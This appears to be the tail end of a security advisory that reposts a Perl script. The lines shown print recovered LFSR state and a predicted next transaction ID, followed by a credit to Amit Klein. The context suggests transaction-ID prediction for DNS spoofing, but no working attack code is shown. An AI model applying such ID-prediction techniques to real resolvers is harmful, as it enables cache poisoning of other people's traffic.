printf "*** LFSR1=0x%08x LFSR2=0x%08x Next_TRXID=0x%04x ***\n",
print "INFO: Elapsed time: ".($end_time-$start_time)." seconds\n";
The information has been provided by <>
Amit Klein.
The original article can be found at:
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